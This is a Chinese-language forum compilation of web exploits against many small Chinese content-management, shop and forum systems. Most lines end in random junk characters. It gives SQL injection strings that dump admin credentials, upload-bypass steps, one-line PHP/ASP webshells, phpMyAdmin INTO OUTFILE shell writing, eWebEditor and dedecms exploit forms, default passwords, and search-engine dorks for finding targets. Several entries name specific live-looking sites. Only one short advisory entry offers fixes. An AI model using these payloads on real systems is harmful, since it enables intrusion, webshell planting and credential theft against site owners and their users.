启航企业建站系统 cookie注入漏洞通杀所有版本 Y$ k0 W7 V3 g/ ^1 U. c/ z0 |
" a9 ^( D) ^4 U* z) Q2 D$ J( I
直接上exploit:0 p& B2 ~- T! g8 p6 s1 B
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
& C9 A$ V" l: s. ~2 Y" j8 jtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
& l l/ g4 ]8 _$ P: k: p" f--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* Y7 v( u f# _/ n6 G
Asprain论坛 注册用户 上传图片就可拿到webshell# g! l- R! A$ {$ m0 I/ r& w! w
9 I P, s& P) x- Q- u6 yAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
5 q/ ?: p1 e+ Y8 n0 Z$ c1.txt存放你的一句话马 如:<%execute(request("cmd"))%>( s" X2 N- K, i$ C# r+ h
2.gif 为一小图片文件,一定要小,比如qq表情图片! Q5 M/ u; F7 ~2 ?' K9 _ {
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用) }; K6 U. i$ ?+ |
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了+ m. e# S- R" S/ c1 X5 p3 s
5.q.asp;.gif$ {& y) b. S% G6 f
google:Powered by Asprain
- b$ K& a2 e6 r: w--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 q8 w" j u. D% R5 T+ W
0 u9 N& ` C+ G6 \ G1 o2 c' J) c5 QShopNum1全部系统存在上传漏洞。6 @ R" D! O: q" G
( E C b, o$ i0 C
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
" M7 I" Y( w0 Q% N1 y! d1 R按说明 提示登录后台。。. N7 I' H6 p' R! u8 p+ r- t
在后台功能页面->附件管理->附件列表; Q+ X. j" z# f
可以直接上传.aspx 后缀木马
8 a( N/ A5 T8 b' P. Z$ ~1 K0 Zhttp://demo.shopnum1.com/upload/20110720083822500.aspx* _) L: s O' _+ M# t' V; Y# C e0 l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 s, q3 |6 U3 ]: F
, |2 q" s/ t5 P% v8 U, ^牛牛CMS中小企业网站管理系统 上传漏洞
/ K8 f& l% T, B3 U4 x; e% ^
& W" u( f* V: s+ {6 r ~牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
' u3 q3 z: |9 l; J# h( i, T# O后台:admin/login.asp, L9 {' f+ y2 H( M+ j# w6 X
ewebeditor 5.5 Nday
3 s9 R( b) T$ m% f0 Wexp:7 w, P* B% {) w# y) A
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
- ?+ v7 ^1 U) M" o; \# A% T" K# w<input?type=file?name=uploadfile?size=100><br><br>?7 D, }6 A9 L/ u! f0 [/ e
<input?type=submit?value=upload>?
" u3 p3 h1 P4 A) c/ s8 r</form>( F8 ~4 D' N. ^6 J: |! U8 N* ^
ps:先上传小马.% `* u$ _- I+ M: ]0 W4 ^% ?
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
" g9 P- b9 }( |* |' F) S, g: J/ S) m/ B: Y: i" x* }+ j
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ U) P0 b* W4 ?0 a# c5 _) @
, Z' i7 ~7 l J& w; UYothCMS 遍历目录漏洞' R2 r- j' _* ~) { Y0 D3 C' b2 P
) Y k. `: \+ W+ N优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
a+ H1 c% p, S: H默认后台:admin/login.asp7 K$ Q! P3 ~1 ~: u
遍历目录:- k4 _# G+ J5 @* @6 Z5 u
ewebeditor/manage/upload.asp?id=1&dir=../
1 o$ q9 r4 }& x' P0 ?data:
5 j4 V+ m& N3 y8 P% Q! [http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
2 U( {# u$ p8 }0 h' n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: f K3 r Y/ Y8 B! c/ N$ w
: Q- `% k/ F8 T$ O# MNet112企业建站系统 1.0
* j9 g" I0 T0 O3 G4 b6 J9 }+ G3 h9 Q7 I, S/ h" D* e7 e
源码简介:
; {9 Q0 j" U" I% uNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
) Y6 ?' ^! J7 S& A9 S. E添加管理员:1 M0 f* ]" k- k& M; W+ z; C( ?
http://www.0855.tv/admin/admin.asp?action=add&level=2; W# U& F6 |1 N+ Q1 G5 |7 h/ s$ L
其实加不加都不是很重要,后台文件都没怎么作验证。
, u; f7 G& b/ M$ {- T上传路径:
3 p. ? o4 n, l0 qhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
' m+ u9 X4 |& \! Q5 hhttp://www.0855.tv/inc/Upfile.asp?Stype=2' Y7 T. ]. o0 U/ P% P# F8 H
怎么利用自己研究。4 l( X* V% @' p- L s8 A3 V1 V
遍历目录:9 J* ~0 z" a& y
http://www.0855.tv/admin/upfile.asp?path=../..
! L. s% g& a% N' }4 G0 d如:7 Y4 T+ G, z" ^& C" m$ _+ U
http://www.0855.tv/admin/upfile.asp?path=../admin v% m5 C) `0 P
http://www.0855.tv/admin/upfile.asp?path=../data
, i4 j2 ~6 y9 Y" s, [& V( p0 @% T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 P$ Z1 d/ M; s) G, u9 s! m. e
, s* R! s% p# n8 |; E& d7 L3 z易和阳光购物商城通杀 上传漏洞8 j, N9 H5 M* D1 }7 X! }3 z" H. t
7 g- |$ |" K* o7 G1 `" {, x$ ], i
前提要求是IIS6.0+asp坏境。# m8 B+ U. _& l1 ]! N
漏洞文件Iheeo_upfile.asp ' i0 s, d5 K+ D
过滤不严.直接可以iis6.0上传
' b# D" K9 U$ k: G4 }6 W把ASP木马改成0855.asp;1.gif
7 R0 L/ ?' X" y直接放到明小子上传
( o$ k$ x8 k" E$ }; U3 U& n' r5 tGoogle搜索:inurl:product.asp?Iheeoid=) j/ U9 y6 C7 Q% r( m
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' g# q8 C% a" l0 I6 ?- j. ]5 q1 F8 W+ ^, Z |( s3 z: |
phpmyadmin后台4种拿shell方法& d0 R" H; `$ e4 E0 b
& P0 ~1 P6 e/ f' u方法一:9 u2 d7 t- @0 d! d
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );/ e* Q$ S3 q9 [& ^
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');+ P u& [+ n y
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';+ j, k7 o' L0 t7 X
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
0 \7 m7 w6 g5 x# g8 }2 a& ]一句话连接密码:xiaoma7 H) n4 N2 @$ X4 g$ G: U
方法二:: e, Q# O; [6 k8 l( N
Create TABLE xiaoma (xiaoma1 text NOT NULL);4 U* B0 G+ o2 e( J Q8 W% Z
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');! A8 L \ ]- ^) s
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
& m- r% |( l" Q% SDrop TABLE IF EXISTS xiaoma;. G' a5 s4 ^% [2 p7 c& K: T( }
方法三:
1 D! P3 o) ?/ n4 H e9 s$ g2 \7 W读取文件内容: select load_file('E:/xamp/www/s.php');
+ {9 c: @4 ~2 j- S# R& T6 I写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
T# @0 k2 B" h, Y3 w, vcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( N$ B+ F6 \5 j% C! {, P方法四:
6 p4 [3 q6 b" L- }select load_file('E:/xamp/www/xiaoma.php');% I/ }/ @1 u4 `' U2 m9 z6 f
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'$ }, U) }) h7 U# q! x9 M$ D; J/ x; `
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir) n4 G0 d9 ~+ p* v* Q2 @0 ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 ^; u; ~3 I: N$ Q6 y
4 S, J$ F! f- c( T: G& F1 m$ h传信网络独立开发网站源码0day漏洞4 R* y6 r: @% w( @) |
( N5 g$ N3 @: ?0 u6 \4 |8 c后台system/login.asp, {6 v+ g/ x f: M6 \) j
进了后台有个ewebeditor1 ~9 ` _& c: M$ W, P7 c6 S. F
Google 搜索inurl:product1.asp?tyc=+ d/ K8 X5 \7 X! B1 B- s8 L, n
编辑器漏洞默认后台ubbcode/admin_login.asp: _1 e3 U) A7 S6 X& o- @5 J
数据库ubbcode/db/ewebeditor.mdb1 c( s2 \- s! @4 r, ~
默认账号密码yzm 111111
- N6 ?7 V2 ]* p; U4 C
9 e1 u/ x& ?3 ~$ k) w拿webshell方法
! e( ]& F/ E! ?登陆后台点击“样式管理”-选择新增样式 0 H& f! [- B4 a/ u8 N
样式名称:scriptkiddies 随便写 / g2 ~+ Z' ~: o# c* h, j/ R1 `9 R
路径模式:选择绝对路径
) V" ?6 e2 L/ r+ J3 d图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
8 j* o4 I, p5 v5 S5 f4 L9 T图片类型比如就是我们要上传的ASP木马格式
" L, l. v7 z8 Y! R上传路径:/
) D/ \- M4 J4 H3 {# |, g# p7 Z E图片限制:写上1000 免的上不了我们的asp木马
; F( z/ v! Z* x5 X上传内容不要写
# ]$ K& P- M$ P可以提交了 9 X4 {; a/ W; t* r
样式增加成功! ' b5 `& |6 W h, {( ~
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 5 p" o- g; Q& E% s$ |
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置1 |" Y* Q( r- X+ B+ n
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies5 _+ ^* E& z L" z6 [9 x
上ASP木马 回车 等到路径
) B1 p- M8 ?+ ^5 f. I( F0 D' U6 q/ B7 a% Q
后台:system/login.asp N7 A3 S4 `+ ~1 X* t b9 I
Exp:2 L1 V1 H& H0 ~0 S2 V
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master) E! p7 s( M7 K5 q2 B3 a# }
测试:& |$ D$ e# K1 A5 z& F W! t3 N$ A; i% z
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
, [- s7 ]. e* O! a) Mhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master7 b. _8 ]' ^4 M- Y1 \
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: z3 y# W7 ^# t
" U- C! P, j9 \0 lfoosun 0day 最新注入漏洞
7 S6 S) W4 L% b, o8 o* K6 z4 e$ [4 d2 @
漏洞文件:www.xxx.com/user/SetNextOptions.asp
. M( g3 ^2 _: ^) J% Q6 X利用简单的方法:( b- {& n" C/ X$ u
暴管理员帐号:
- p+ [1 u8 k8 k& Q% Fhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
8 ^* }; A" @/ V- m2 {" d7 ?: t1 ]9 v4 @暴管理员密码:
7 s% I2 s3 i3 q4 Q2 Dhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
: ? t) h" i8 `+ ?( j3 S' W% t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ y, V$ h* F9 B* w
( U0 U; H3 e+ K% _/ ^网站程序的版权未知!$ E# i: X1 _$ J) c
E# @) \1 \, r4 [( g) j默认网站数据库:3 O% e% J2 z, Z
www.i0day.com/data/nxnews.mdb2 e& ~. O5 R w7 c% `# e
ewebeditor 在线编辑器:
5 m2 J, ]' t6 r( J+ `编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb, c, B, @& \9 J0 ?$ R: i5 ^6 i3 T
登录地址:ewebeditor/admin_login.asp
7 F$ i, A/ H1 S: L- f# F8 [, l) l默认密码:admin admin+ H9 p) Y$ K7 e# ^
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data2 g# ~3 y5 z+ D- H1 F' d* ~
5 h0 y, a0 @; S4 M
Sql注入漏洞:
" s6 {: X4 o1 y$ |6 G0 R% S) g: Phttp://www.i0day.com/detail.asp?id=12
0 \$ A8 ?) K% y! z1 B" U; Z) Z0 O7 \exp:
5 q% s! ]8 M& e# R( u4 Bunion select 1,admin,password,4,5,6,7,8 from admin
/ ~+ }$ u- d# {; B7 L, [爆出明文帐号/密码4 D) ~0 v; X. K0 ^
; G% N6 O9 q( {. v4 r- F上传漏洞:) g- t) p2 ^' I! T. c
后台+upfile.asp
8 A$ ]" m2 d8 Q0 ^如:7 b" B/ ^# o- }& v
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。5 C$ p6 U' t. k* Y
shell的地址:网址+后台+成功上传的马3 r0 a: C/ ? S$ [3 c$ i
google:inurl:news.asp?lanmuName=* r; s. \* o$ z" u
------------------------------------------------------------------------------------------------------------------------------------------------------------------------* ^. g7 v" c1 k% u! Y3 q! g$ h/ c
( z f/ l5 W M: W/ H% Ydedecms最新0day利用不进后台直接拿WEBSHELL" w0 M9 o4 x, M, R% }% g# p
, G. l' R" `% d Z! }, \
拿webshell的方法如下:8 o k' s2 Y2 |6 |2 k! }8 D# f0 y
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.# s! g5 O4 V8 k
前题条件,必须准备好自己的dede数据库,然后插入数据:
0 H$ k1 ]5 {4 a# Y; ~ }+ Uinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
* k1 B# P' }1 q6 A( l& p
+ G. k' h3 H$ S. O7 Q& [5 j: B, R再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。- ^9 e6 f) J8 r3 W7 [0 J
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
& a, E' ^3 v) z<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
6 ~3 {) I/ C' I<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />* L6 b& |1 i9 ^* u# T
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />- W% H2 w) ]: U1 `
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />( l( ^5 O8 M6 Q" [( B- V7 z( N
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
4 _. S, v$ o6 g2 H9 t0 s<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( P& {( S E) w2 }% ?9 }
<input type="text" value="true" name="nocache" style="width:400">$ s" R6 z+ K0 h1 i
<input type="submit" value="提交" name="QuickSearchBtn"><br />6 w6 G$ S* W. }& H6 N
</form>7 U# t( f# Y' }5 Y$ q
<script>
. U# I! e9 [2 Afunction addaction()
: M" L' S0 b: z9 R) t) K4 r8 y{
) j) Z# v4 b8 [0 Ddocument.QuickSearch.action=document.QuickSearch.doaction.value;
! \% Y& g8 Z0 i. W% }9 w; d}4 j5 H6 g" D) p& N# \
</script>: K: |, {7 V$ e$ t; P1 J( n
-----------------------------------------------------------------------------------------------------------------------------------------------6 a, w2 H4 c i3 h- `
9 K$ t! y) g" `1 \. c5 e
dedecms织梦暴最新严重0day漏洞
: @9 ~2 Q! W8 a6 ?' v8 Rbug被利用步骤如下:# [" `' a4 K/ h6 }0 p
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 Z$ o% L2 \. N, B/ p把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
: L! d) t$ i8 U+ m9 t7 X3 m-------------------------------------------------------------------------------------------------------------------------------------------
2 y+ I8 h, o' V1 A) q6 s
; H0 O" K% N+ v- W, P多多淘宝客程序上传漏洞 5 q. \( h2 F! e! Z; P9 s7 B7 }
漏洞页面:) A- O S1 _- c: w# H, i' q1 J' B
admin\upload_pic.php4 o; t: Y3 g) f5 t' t* D) [! t( Y O
传送门:
2 p$ y( X! m2 _http://www.www.com/admin/upload_pic.php?uploadtext=slide1* Z7 I' N8 m! m4 i8 \; n
PS:copy张图片马 直接 xxx.php 上传抓包地址!: [% U7 k! Y+ a5 W: t. {1 ~
------------------------------------------------------------------------------------------------------------------------------------------------------ W9 j. n: m% ~1 a r
9 m1 ~$ \" v4 v9 x
无忧公司系统ASP专业版后台上传漏洞" l& G* A1 {4 \: t) L
漏洞文件 后台上传
, q# w& T: Z3 Y' `2 n5 r9 t3 ladmin/uploadPic.asp* M9 w; g3 M. O
漏洞利用 这个漏洞好像是雷池的
! M7 j8 @- f ahttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1/ B- ]+ ~/ |. u5 N8 X
等到的webshell路径:
; v w' ]6 N1 E' z, L/UploadFiles/scriptkiddies.asp;_2.gif8 r" l* S% B) N- A8 U; `" R! S) [
---------------------------------------------------------------------------------------------------------------------------------------------------
7 J; ^4 z5 W. e0 U1 k4 [ ~# I" F. g& L. q2 d) H2 t
住哪酒店分销联盟系统20108 G) B! R2 P7 _0 K5 ~( j
Search:
' P+ f% ~" O- g. F3 x. D' binurl:index.php?m=hotelinfo
3 m8 h1 b/ |4 [+ g, @+ nhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin0 l, |( J. Q2 U5 F4 W4 k
默认后台:index.php?m=admin/login
! u% r. p# O$ ]# J. x, Q4 w# b% x--------------------------------------------------------------------------------------------------------------------------------------------------/ I" u Q8 ~- s' s
, r- b& J( Z/ B. p8 kinurl:info_Print.asp?ArticleID=
( u# ]* X+ y' f后台 ad_login.asp
0 |$ u( K; c: Y爆管理员密码:9 E4 p3 Z* t: [. c: |% ~: u7 Z0 B. ^
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
/ Y9 p$ A% C0 A9 ^; g: f7 u------------------------------------------------------------------------------------------------------------------------------------------------------------
z2 D0 Y+ u* j, g
' e3 Y" c9 G, R9 r, s搜索框漏洞!: q. [! B2 \; ^1 K! y! y( u
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
0 d& @% O9 }3 P \) ~+ G/ j--------------------------------------------------------------------------------------------------------------------------------------------------------
( p: V Q7 O9 ~) K# k! ~: G4 e3 b! n1 D8 x# h
关键字:
% G8 J- w' K* k. u, Pinurl:/reg_TemletSel.asp?step=2
! B! z, d5 C( l) o2 X, L- I或者& K+ Y5 E. u1 s9 l( f) |. }
电子商务自助建站--您理想的助手
* ]: Y, C5 {8 c5 J$ V-------------------------------------------------------------------------------------------------------------------------------------------------
- `& Q& j& K4 V+ k. m' E/ v
0 J. V. K8 h0 z/ w9 ^, {iGiveTest 2.1.0注入漏洞' H6 s2 K' q4 o: w/ S$ Y
Version: <= 2.1.0
$ I- F% k: N ^/ Q: M6 w8 c ^# Homepage: http://iGiveTest.com// ?3 C1 e. \ A: `
谷歌关键字: “Powered by iGiveTest”: q' A0 Z* w; f# r
随便注册一个帐号。然后暴管理员帐号和密码' a1 G+ E5 ~! `+ s- @/ X2 Z i
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (19 c; t2 b7 f* }+ C6 B
------------------------------------------------------------------------------------------------------------------------------------------------1 X: v! u1 |0 d' b/ m
8 ?0 o" F0 |$ d. P) s8 h: B
CKXP网上书店注入漏洞
6 R7 u4 u' C) D& N1 e& T- c n工具加表:shop_admin 加字段:admin. N3 t: j0 q) F$ ^
后台:admin/login.asp
/ O6 G( M S$ T7 c$ A8 R登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/8 `% U1 b2 ^# y9 F
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息' a. T* ?3 g. H9 o# W; X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 n' X. `5 V. b: B1 C! c' f
8 R/ M7 X' T% O4 a3 L, {段富超个人网站系统留言本写马漏洞
2 D- D: ~: j- P$ K; N3 c源码下载:http://www.mycodes.net/24/2149.htm
1 h' A+ w/ u& ^9 A8 Taddgbook.asp 提交一句话。
, W, u( y! o: { \; X连接: http://www.xxxx.tv/date/date3f.asp4 U" N" X* K' N: k+ F# Z
google:为防批量,特略!2 ]% K1 B* [; \9 F
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 q) y( {' d( i# q6 `8 D; \: J
9 p& E( }( m; b/ o+ O
智有道专业旅游系统v1.0 注入及列目录漏洞& t: ^# I6 q4 x, ]4 X: z
默认后台路径:/admin/login.asp) N& |2 Q5 {2 s* M) m q" a8 P( j
默认管理员:admin i4 o k+ m, W1 T& ?4 b' w6 |
默认密码:123456
/ D& Q& k0 @8 T' r1 o& \+ DSQL EXP Tset:3 V4 U9 V4 j* ~. J/ y& ]
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
9 O# `# c: ^3 a/ ~8 K9 d o------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 n4 V ]6 P+ G6 Q! q7 G1 l. ^" q: {' \) Q
ewebeditor(PHP) Ver 3.8 本任意文件上传0day$ _, C3 V# |* N9 Y+ Q4 n. J M7 r6 `
EXP:
d& {" G/ S/ w j* a<title>eWebeditoR3.8 for php任意文件上EXP</title>" O/ X+ W6 R& W/ ?5 N
<form action="" method=post enctype="multip) d6 v- [# x0 s5 I) |
art/form-data"> 0 b' i/ k( D1 v+ P/ t% ?
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> - \0 ^6 q' J* Y) F9 a
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 7 m7 ^" s4 v8 E$ o
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
: N3 { N3 H1 P1 l6 P$ Mfile:<input type=file name="uploadfile"><br>
# h# G' i/ C g0 F0 A<input type=button value=submit onclick=fsubmit()>
" [ ]0 [$ T% M) y" S+ V</form><br>
6 b& n! n4 {" e/ E8 X: {: R<script>
+ G0 [# f o5 D) N( Gfunction fsubmit(){ " E: E! h- @/ u8 a8 B+ U
form = document.forms[0]; 4 T0 V. [. f. ~5 S+ H
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
' P/ W' l! B# I4 O5 malert(form.action);
2 c: o+ m; W1 nform.submit();
3 l1 i* O# z# O0 Q% |, s7 }} ( {& Y1 ^8 a, x' Q$ C8 Y, }
</script>8 F! b s4 V: X5 F
注意修改里面ewebeditor的名称还有路径。
3 @7 j6 i1 ^! }0 d$ m( ?---------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 p9 k3 U# B, x- V- _
7 S2 S* }5 G2 G. I5 ]% Y提交’时提示ip被记录 防注入系统的利用* J( K) o' i( g9 _, S
网址:http://www.xxx.com/newslist.asp?id=122′
1 E2 r7 n5 S4 [提示“你的操作已被记录!”等信息。
8 Z) \( a, @$ z; a, E" w* j; Q利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
) i" L* n6 k3 ~$ b-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" _1 B8 k) a7 U+ I
6 O1 J' A* I: H2 z/ u# H- l9 R西部商务网站管理系统 批量拿shell-0day
8 Q; @8 Z9 {! ?" W/ N: }这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 9 r, Q% P% }$ H9 y; B' l- _ q
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛* N! P5 a D" s2 l( _
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
1 v& l' X2 d0 s; e0 V; W3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
( j" _. i8 n! G7 g3 M& S---------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 l5 T" M7 b3 N$ }% X* ~
5 K+ e% Y+ H1 L" M/ a
JspRun!6.0 论坛管理后台注入漏洞
2 j A# K( _4 t6 ^7 f( e5 J9 _4 D0 G# [1 H$ `2 V5 b
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
5 o6 A: @4 l7 F, G* H% L- vJspRun!6.0 . O6 z! W d4 T# @4 C! ~) O- o
漏洞描述:
; Q; U$ m5 T/ YJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
/ g( Y, R" Z; P6 y1 b1 y% ~ j2 r在处理后台提交的文件中ForumManageAction.java第1940行- m4 j" a" L" F _
String export = request.getParameter("export");//直接获取,没有安全过滤3 e. C8 J3 W3 Z: N# J
if(export!=null){, \0 `: I- X& y; {. @( j
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...) [ M M$ M2 \
if(styles==null||styles.size()==0){$ x8 \3 B( ^. m3 m
<*参考8 G8 t7 B7 _4 P" O9 C; t" q
nuanfan@gmail.com
* M2 l9 ]2 K( x( n- L1 b G*> SEBUG安全建议:2 Z5 A9 @: [' H! |. J/ {4 i
www.jsprun.net3 E0 R7 a- v( ]: I4 p% h! S5 j2 g- O
(1)安全过滤变量export
$ A& \8 F, F! C8 Z(2)在查询语句中使用占位符- x2 u# n8 D$ q4 I6 A6 ?& m0 o
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 _% V1 r) P+ u2 _! P- b9 O) D5 _1 `
* o# Z t# [1 {6 M" Q
乌邦图企业网站系统 cookies 注入) t! Z9 n; M& k" Y# P" b, v9 E
# _. r) u! i/ g! r* F; e程序完整登陆后台:/admin/login.asp
f) a! ?3 f E- O& X: k# I1 t默认登陆帐号:admin 密码:admin888
/ k2 D; |5 p) y语句:(前面加个空格)- ?. Y9 E! Z& s; a
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin9 u2 ^; O+ e; p
或者是16个字段:
: _) F; R# @6 Mand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
7 t6 s& t3 W: F% _8 @) U; O. v. N爆不出来自己猜字段。
^0 @4 t# b1 W: d) \注入点:http://www.untnt.com/shownews.asp?=88
4 e# _$ Z9 K$ Qgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
z- a; ^. n. K6 S! T. }/ x关键字:3 j- r* t; k# T: b# j8 k3 Z3 m3 w
inurl:shownews?asp.id=
. s# ?: {3 c: ]0 O) [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 v( ^+ _8 u S& P1 {$ u8 F# Z" G
! p7 h! I! A9 y* B; O5 O! fCKXP网上书店注入漏洞
( |4 `- h: J. \! l
9 O X* K) F: c+ l; V- u工具加表:shop_admin 加字段:admin& m `, x1 }7 Z, A( z
后台:admin/login.asp
, F" `( U: H8 X, y登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
" {: U4 i: V0 m) N3 @2 ainurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息2 u7 }7 o4 B1 r
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 { |' Q& e: a9 Q! F6 B& T( b* T+ J& }
YxShop易想购物商城4.7.1版本任意文件上传漏洞
